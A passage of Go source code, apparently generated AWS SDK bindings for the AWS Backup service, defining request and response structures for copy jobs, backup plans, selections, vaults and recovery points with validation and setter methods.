Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s AlreadyExistsException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s AlreadyExistsException) GoString() string {
return s.String()
}
func newErrorAlreadyExistsException(v protocol.ResponseMetadata) error {
return &AlreadyExistsException{
RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *AlreadyExistsException) Code() string {
return "AlreadyExistsException"
}
// Message returns the exception's message.
func (s *AlreadyExistsException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *AlreadyExistsException) OrigErr() error {
return nil
}
func (s *AlreadyExistsException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// Status code returns the HTTP status code for the request's response error.
func (s *AlreadyExistsException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for request.
func (s *AlreadyExistsException) RequestID() string {
return s.RespMetadata.RequestID
}
// Contains DeleteAt and MoveToColdStorageAt timestamps, which are used to specify
// a lifecycle for a recovery point.
//
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup transitions and expires backups automatically
// according to the lifecycle that you define.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, the “expire after days” setting must be
// 90 days greater than the “transition to cold after days” setting. The
// “transition to cold after days” setting cannot be changed after a backup
// has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
type CalculatedLifecycle struct {
_ struct{} `type:"structure"`
// A timestamp that specifies when to delete a recovery point.
DeleteAt *time.Time `type:"timestamp"`
// A timestamp that specifies when to transition a recovery point to cold storage.
MoveToColdStorageAt *time.Time `type:"timestamp"`
}
// String returns the string representation
func (s CalculatedLifecycle) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CalculatedLifecycle) GoString() string {
return s.String()
}
// SetDeleteAt sets the DeleteAt field's value.
func (s *CalculatedLifecycle) SetDeleteAt(v time.Time) *CalculatedLifecycle {
s.DeleteAt = &v
return s
}
// SetMoveToColdStorageAt sets the MoveToColdStorageAt field's value.
func (s *CalculatedLifecycle) SetMoveToColdStorageAt(v time.Time) *CalculatedLifecycle {
s.MoveToColdStorageAt = &v
return s
}
// Contains an array of triplets made up of a condition type (such as StringEquals),
// a key, and a value. Conditions are used to filter resources in a selection
// that is assigned to a backup plan.
type Condition struct {
_ struct{} `type:"structure"`
// The key in a key-value pair. For example, in "ec2:ResourceTag/Department":
// "accounting", "ec2:ResourceTag/Department" is the key.
//
// ConditionKey is a required field
ConditionKey *string `type:"string" required:"true"`
// An operation, such as StringEquals, that is applied to a key-value pair used
// to filter resources in a selection.
//
// ConditionType is a required field
ConditionType *string `type:"string" required:"true" enum:"ConditionType"`
// The value in a key-value pair. For example, in "ec2:ResourceTag/Department":
// "accounting", "accounting" is the value.
//
// ConditionValue is a required field
ConditionValue *string `type:"string" required:"true"`
}
// String returns the string representation
func (s Condition) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s Condition) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *Condition) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "Condition"}
if s.ConditionKey == nil {
invalidParams.Add(request.NewErrParamRequired("ConditionKey"))
}
if s.ConditionType == nil {
invalidParams.Add(request.NewErrParamRequired("ConditionType"))
}
if s.ConditionValue == nil {
invalidParams.Add(request.NewErrParamRequired("ConditionValue"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetConditionKey sets the ConditionKey field's value.
func (s *Condition) SetConditionKey(v string) *Condition {
s.ConditionKey = &v
return s
}
// SetConditionType sets the ConditionType field's value.
func (s *Condition) SetConditionType(v string) *Condition {
s.ConditionType = &v
return s
}
// SetConditionValue sets the ConditionValue field's value.
func (s *Condition) SetConditionValue(v string) *Condition {
s.ConditionValue = &v
return s
}
// The details of the copy operation.
type CopyAction struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies the destination backup
// vault for the copied backup. For example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
//
// DestinationBackupVaultArn is a required field
DestinationBackupVaultArn *string `type:"string" required:"true"`
// Contains an array of Transition objects specifying how long in days before
// a recovery point transitions to cold storage or is deleted.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, on the console, the “expire after days”
// setting must be 90 days greater than the “transition to cold after days”
// setting. The “transition to cold after days” setting cannot be changed
// after a backup has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
Lifecycle *Lifecycle `type:"structure"`
}
// String returns the string representation
func (s CopyAction) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CopyAction) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *CopyAction) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "CopyAction"}
if s.DestinationBackupVaultArn == nil {
invalidParams.Add(request.NewErrParamRequired("DestinationBackupVaultArn"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetDestinationBackupVaultArn sets the DestinationBackupVaultArn field's value.
func (s *CopyAction) SetDestinationBackupVaultArn(v string) *CopyAction {
s.DestinationBackupVaultArn = &v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *CopyAction) SetLifecycle(v *Lifecycle) *CopyAction {
s.Lifecycle = v
return s
}
// Contains detailed information about a copy job.
type CopyJob struct {
_ struct{} `type:"structure"`
// The account ID that owns the copy job.
AccountId *string `type:"string"`
// The size, in bytes, of a copy job.
BackupSizeInBytes *int64 `type:"long"`
// The date and time a copy job is completed, in Unix format and Coordinated
// Universal Time (UTC). The value of CompletionDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CompletionDate *time.Time `type:"timestamp"`
// Uniquely identifies a copy job.
CopyJobId *string `type:"string"`
// Contains information about the backup plan and rule that AWS Backup used
// to initiate the recovery point backup.
CreatedBy *RecoveryPointCreator `type:"structure"`
// The date and time a copy job is created, in Unix format and Coordinated Universal
// Time (UTC). The value of CreationDate is accurate to milliseconds. For example,
// the value 1516925490.087 represents Friday, January 26, 2018 12:11:30.087
// AM.
CreationDate *time.Time `type:"timestamp"`
// An Amazon Resource Name (ARN) that uniquely identifies a destination copy
// vault; for example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
DestinationBackupVaultArn *string `type:"string"`
// An ARN that uniquely identifies a destination recovery point; for example,
// arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
DestinationRecoveryPointArn *string `type:"string"`
// Specifies the IAM role ARN used to copy the target recovery point; for example,
// arn:aws:iam::123456789012:role/S3Access.
IamRoleArn *string `type:"string"`
// The AWS resource to be copied; for example, an Amazon Elastic Block Store
// (Amazon EBS) volume or an Amazon Relational Database Service (Amazon RDS)
// database.
ResourceArn *string `type:"string"`
// The type of AWS resource to be copied; for example, an Amazon Elastic Block
// Store (Amazon EBS) volume or an Amazon Relational Database Service (Amazon
// RDS) database.
ResourceType *string `type:"string"`
// An Amazon Resource Name (ARN) that uniquely identifies a source copy vault;
// for example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
SourceBackupVaultArn *string `type:"string"`
// An ARN that uniquely identifies a source recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
SourceRecoveryPointArn *string `type:"string"`
// The current state of a copy job.
State *string `type:"string" enum:"CopyJobState"`
// A detailed message explaining the status of the job to copy a resource.
StatusMessage *string `type:"string"`
}
// String returns the string representation
func (s CopyJob) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CopyJob) GoString() string {
return s.String()
}
// SetAccountId sets the AccountId field's value.
func (s *CopyJob) SetAccountId(v string) *CopyJob {
s.AccountId = &v
return s
}
// SetBackupSizeInBytes sets the BackupSizeInBytes field's value.
func (s *CopyJob) SetBackupSizeInBytes(v int64) *CopyJob {
s.BackupSizeInBytes = &v
return s
}
// SetCompletionDate sets the CompletionDate field's value.
func (s *CopyJob) SetCompletionDate(v time.Time) *CopyJob {
s.CompletionDate = &v
return s
}
// SetCopyJobId sets the CopyJobId field's value.
func (s *CopyJob) SetCopyJobId(v string) *CopyJob {
s.CopyJobId = &v
return s
}
// SetCreatedBy sets the CreatedBy field's value.
func (s *CopyJob) SetCreatedBy(v *RecoveryPointCreator) *CopyJob {
s.CreatedBy = v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *CopyJob) SetCreationDate(v time.Time) *CopyJob {
s.CreationDate = &v
return s
}
// SetDestinationBackupVaultArn sets the DestinationBackupVaultArn field's value.
func (s *CopyJob) SetDestinationBackupVaultArn(v string) *CopyJob {
s.DestinationBackupVaultArn = &v
return s
}
// SetDestinationRecoveryPointArn sets the DestinationRecoveryPointArn field's value.
func (s *CopyJob) SetDestinationRecoveryPointArn(v string) *CopyJob {
s.DestinationRecoveryPointArn = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *CopyJob) SetIamRoleArn(v string) *CopyJob {
s.IamRoleArn = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *CopyJob) SetResourceArn(v string) *CopyJob {
s.ResourceArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *CopyJob) SetResourceType(v string) *CopyJob {
s.ResourceType = &v
return s
}
// SetSourceBackupVaultArn sets the SourceBackupVaultArn field's value.
func (s *CopyJob) SetSourceBackupVaultArn(v string) *CopyJob {
s.SourceBackupVaultArn = &v
return s
}
// SetSourceRecoveryPointArn sets the SourceRecoveryPointArn field's value.
func (s *CopyJob) SetSourceRecoveryPointArn(v string) *CopyJob {
s.SourceRecoveryPointArn = &v
return s
}
// SetState sets the State field's value.
func (s *CopyJob) SetState(v string) *CopyJob {
s.State = &v
return s
}
// SetStatusMessage sets the StatusMessage field's value.
func (s *CopyJob) SetStatusMessage(v string) *CopyJob {
s.StatusMessage = &v
return s
}
type CreateBackupPlanInput struct {
_ struct{} `type:"structure"`
// Specifies the body of a backup plan. Includes a BackupPlanName and one or
// more sets of Rules.
//
// BackupPlan is a required field
BackupPlan *PlanInput `type:"structure" required:"true"`
// To help organize your resources, you can assign your own metadata to the
// resources that you create. Each tag is a key-value pair. The specified tags
// are assigned to all backups created with this plan.
BackupPlanTags map[string]*string `type:"map" sensitive:"true"`
// Identifies the request and allows failed requests to be retried without the
// risk of running the operation twice. If the request includes a CreatorRequestId
// that matches an existing backup plan, that plan is returned. This parameter
// is optional.
CreatorRequestId *string `type:"string"`
}
// String returns the string representation
func (s CreateBackupPlanInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CreateBackupPlanInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *CreateBackupPlanInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "CreateBackupPlanInput"}
if s.BackupPlan == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlan"))
}
if s.BackupPlan != nil {
if err := s.BackupPlan.Validate(); err != nil {
invalidParams.AddNested("BackupPlan", err.(request.ErrInvalidParams))
}
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlan sets the BackupPlan field's value.
func (s *CreateBackupPlanInput) SetBackupPlan(v *PlanInput) *CreateBackupPlanInput {
s.BackupPlan = v
return s
}
// SetBackupPlanTags sets the BackupPlanTags field's value.
func (s *CreateBackupPlanInput) SetBackupPlanTags(v map[string]*string) *CreateBackupPlanInput {
s.BackupPlanTags = v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *CreateBackupPlanInput) SetCreatorRequestId(v string) *CreateBackupPlanInput {
s.CreatorRequestId = &v
return s
}
type CreateBackupPlanOutput struct {
_ struct{} `type:"structure"`
// A list of BackupOptions settings for a resource type. This option is only
// available for Windows VSS backup jobs.
AdvancedBackupSettings []*AdvancedBackupSetting `type:"list"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup plan; for
// example, arn:aws:backup:us-east-1:123456789012:plan:8F81F553-3A74-4A3F-B93D-B3360DC80C50.
BackupPlanArn *string `type:"string"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// The date and time that a backup plan is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// Unique, randomly generated, Unicode, UTF-8 encoded strings that are at most
// 1,024 bytes long. They cannot be edited.
VersionId *string `type:"string"`
}
// String returns the string representation
func (s CreateBackupPlanOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CreateBackupPlanOutput) GoString() string {
return s.String()
}
// SetAdvancedBackupSettings sets the AdvancedBackupSettings field's value.
func (s *CreateBackupPlanOutput) SetAdvancedBackupSettings(v []*AdvancedBackupSetting) *CreateBackupPlanOutput {
s.AdvancedBackupSettings = v
return s
}
// SetBackupPlanArn sets the BackupPlanArn field's value.
func (s *CreateBackupPlanOutput) SetBackupPlanArn(v string) *CreateBackupPlanOutput {
s.BackupPlanArn = &v
return s
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *CreateBackupPlanOutput) SetBackupPlanId(v string) *CreateBackupPlanOutput {
s.BackupPlanId = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *CreateBackupPlanOutput) SetCreationDate(v time.Time) *CreateBackupPlanOutput {
s.CreationDate = &v
return s
}
// SetVersionId sets the VersionId field's value.
func (s *CreateBackupPlanOutput) SetVersionId(v string) *CreateBackupPlanOutput {
s.VersionId = &v
return s
}
type CreateBackupSelectionInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies the backup plan to be associated with the selection of
// resources.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
// Specifies the body of a request to assign a set of resources to a backup
// plan.
//
// BackupSelection is a required field
BackupSelection *Selection `type:"structure" required:"true"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice.
CreatorRequestId *string `type:"string"`
}
// String returns the string representation
func (s CreateBackupSelectionInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CreateBackupSelectionInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *CreateBackupSelectionInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "CreateBackupSelectionInput"}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if s.BackupSelection == nil {
invalidParams.Add(request.NewErrParamRequired("BackupSelection"))
}
if s.BackupSelection != nil {
if err := s.BackupSelection.Validate(); err != nil {
invalidParams.AddNested("BackupSelection", err.(request.ErrInvalidParams))
}
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *CreateBackupSelectionInput) SetBackupPlanId(v string) *CreateBackupSelectionInput {
s.BackupPlanId = &v
return s
}
// SetBackupSelection sets the BackupSelection field's value.
func (s *CreateBackupSelectionInput) SetBackupSelection(v *Selection) *CreateBackupSelectionInput {
s.BackupSelection = v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *CreateBackupSelectionInput) SetCreatorRequestId(v string) *CreateBackupSelectionInput {
s.CreatorRequestId = &v
return s
}
type CreateBackupSelectionOutput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// The date and time a backup selection is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// Uniquely identifies the body of a request to assign a set of resources to
// a backup plan.
SelectionId *string `type:"string"`
}
// String returns the string representation
func (s CreateBackupSelectionOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CreateBackupSelectionOutput) GoString() string {
return s.String()
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *CreateBackupSelectionOutput) SetBackupPlanId(v string) *CreateBackupSelectionOutput {
s.BackupPlanId = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *CreateBackupSelectionOutput) SetCreationDate(v time.Time) *CreateBackupSelectionOutput {
s.CreationDate = &v
return s
}
// SetSelectionId sets the SelectionId field's value.
func (s *CreateBackupSelectionOutput) SetSelectionId(v string) *CreateBackupSelectionOutput {
s.SelectionId = &v
return s
}
type CreateBackupVaultInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of letters, numbers,
// and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// Metadata that you can assign to help organize the resources that you create.
// Each tag is a key-value pair.
BackupVaultTags map[string]*string `type:"map" sensitive:"true"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice.
CreatorRequestId *string `type:"string"`
// The server-side encryption key that is used to protect your backups; for
// example, arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab.
EncryptionKeyArn *string `type:"string"`
}
// String returns the string representation
func (s CreateBackupVaultInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CreateBackupVaultInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *CreateBackupVaultInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "CreateBackupVaultInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *CreateBackupVaultInput) SetBackupVaultName(v string) *CreateBackupVaultInput {
s.BackupVaultName = &v
return s
}
// SetBackupVaultTags sets the BackupVaultTags field's value.
func (s *CreateBackupVaultInput) SetBackupVaultTags(v map[string]*string) *CreateBackupVaultInput {
s.BackupVaultTags = v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *CreateBackupVaultInput) SetCreatorRequestId(v string) *CreateBackupVaultInput {
s.CreatorRequestId = &v
return s
}
// SetEncryptionKeyArn sets the EncryptionKeyArn field's value.
func (s *CreateBackupVaultInput) SetEncryptionKeyArn(v string) *CreateBackupVaultInput {
s.EncryptionKeyArn = &v
return s
}
type CreateBackupVaultOutput struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup vault; for
// example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the Region where they are created. They consist of lowercase letters, numbers,
// and hyphens.
BackupVaultName *string `type:"string"`
// The date and time a backup vault is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
}
// String returns the string representation
func (s CreateBackupVaultOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CreateBackupVaultOutput) GoString() string {
return s.String()
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *CreateBackupVaultOutput) SetBackupVaultArn(v string) *CreateBackupVaultOutput {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *CreateBackupVaultOutput) SetBackupVaultName(v string) *CreateBackupVaultOutput {
s.BackupVaultName = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *CreateBackupVaultOutput) SetCreationDate(v time.Time) *CreateBackupVaultOutput {
s.CreationDate = &v
return s
}
type DeleteBackupPlanInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
}
// String returns the string representation
func (s DeleteBackupPlanInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupPlanInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DeleteBackupPlanInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DeleteBackupPlanInput"}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *DeleteBackupPlanInput) SetBackupPlanId(v string) *DeleteBackupPlanInput {
s.BackupPlanId = &v
return s
}
type DeleteBackupPlanOutput struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup plan; for
// example, arn:aws:backup:us-east-1:123456789012:plan:8F81F553-3A74-4A3F-B93D-B3360DC80C50.
BackupPlanArn *string `type:"string"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// The date and time a backup plan is deleted, in Unix format and Coordinated
// Universal Time (UTC). The value of DeletionDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
DeletionDate *time.Time `type:"timestamp"`
// Unique, randomly generated, Unicode, UTF-8 encoded strings that are at most
// 1,024 bytes long. Version IDs cannot be edited.
VersionId *string `type:"string"`
}
// String returns the string representation
func (s DeleteBackupPlanOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupPlanOutput) GoString() string {
return s.String()
}
// SetBackupPlanArn sets the BackupPlanArn field's value.
func (s *DeleteBackupPlanOutput) SetBackupPlanArn(v string) *DeleteBackupPlanOutput {
s.BackupPlanArn = &v
return s
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *DeleteBackupPlanOutput) SetBackupPlanId(v string) *DeleteBackupPlanOutput {
s.BackupPlanId = &v
return s
}
// SetDeletionDate sets the DeletionDate field's value.
func (s *DeleteBackupPlanOutput) SetDeletionDate(v time.Time) *DeleteBackupPlanOutput {
s.DeletionDate = &v
return s
}
// SetVersionId sets the VersionId field's value.
func (s *DeleteBackupPlanOutput) SetVersionId(v string) *DeleteBackupPlanOutput {
s.VersionId = &v
return s
}
type DeleteBackupSelectionInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
// Uniquely identifies the body of a request to assign a set of resources to
// a backup plan.
//
// SelectionId is a required field
SelectionId *string `location:"uri" locationName:"selectionId" type:"string" required:"true"`
}
// String returns the string representation
func (s DeleteBackupSelectionInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupSelectionInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DeleteBackupSelectionInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DeleteBackupSelectionInput"}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if s.SelectionId == nil {
invalidParams.Add(request.NewErrParamRequired("SelectionId"))
}
if s.SelectionId != nil && len(*s.SelectionId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("SelectionId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *DeleteBackupSelectionInput) SetBackupPlanId(v string) *DeleteBackupSelectionInput {
s.BackupPlanId = &v
return s
}
// SetSelectionId sets the SelectionId field's value.
func (s *DeleteBackupSelectionInput) SetSelectionId(v string) *DeleteBackupSelectionInput {
s.SelectionId = &v
return s
}
type DeleteBackupSelectionOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s DeleteBackupSelectionOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupSelectionOutput) GoString() string {
return s.String()
}
type DeleteBackupVaultAccessPolicyInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
}
// String returns the string representation
func (s DeleteBackupVaultAccessPolicyInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupVaultAccessPolicyInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DeleteBackupVaultAccessPolicyInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DeleteBackupVaultAccessPolicyInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DeleteBackupVaultAccessPolicyInput) SetBackupVaultName(v string) *DeleteBackupVaultAccessPolicyInput {
s.BackupVaultName = &v
return s
}
type DeleteBackupVaultAccessPolicyOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s DeleteBackupVaultAccessPolicyOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupVaultAccessPolicyOutput) GoString() string {
return s.String()
}
type DeleteBackupVaultInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
}
// String returns the string representation
func (s DeleteBackupVaultInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupVaultInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DeleteBackupVaultInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DeleteBackupVaultInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DeleteBackupVaultInput) SetBackupVaultName(v string) *DeleteBackupVaultInput {
s.BackupVaultName = &v
return s
}
type DeleteBackupVaultNotificationsInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the Region where they are created. They consist of lowercase letters, numbers,
// and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
}
// String returns the string representation
func (s DeleteBackupVaultNotificationsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupVaultNotificationsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DeleteBackupVaultNotificationsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DeleteBackupVaultNotificationsInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DeleteBackupVaultNotificationsInput) SetBackupVaultName(v string) *DeleteBackupVaultNotificationsInput {
s.BackupVaultName = &v
return s
}
type DeleteBackupVaultNotificationsOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s DeleteBackupVaultNotificationsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupVaultNotificationsOutput) GoString() string {
return s.String()
}
type DeleteBackupVaultOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s DeleteBackupVaultOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupVaultOutput) GoString() string {
return s.String()
}
type DeleteRecoveryPointInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// An Amazon Resource Name (ARN) that uniquely identifies a recovery point;
// for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
//
// RecoveryPointArn is a required field
